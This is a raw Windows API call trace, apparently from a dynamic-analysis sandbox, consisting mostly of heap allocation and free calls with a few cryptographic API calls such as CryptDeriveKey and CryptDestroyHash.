[0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0180.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0180.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.364] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bd8 [0180.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0180.364] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0180.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0180.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0180.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0180.365] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0180.365] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0180.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0180.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0180.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0180.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50b30 [0180.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50b30, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0180.368] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87610, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87290) returned 1 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0180.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0180.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0180.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0180.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0180.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0180.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0180.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0180.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0180.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0180.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0180.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.382] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0180.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0180.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699c8 [0180.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0180.382] CryptDestroyHash (hHash=0xa87610) returned 1 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0180.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0180.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0180.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0180.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0180.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0180.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 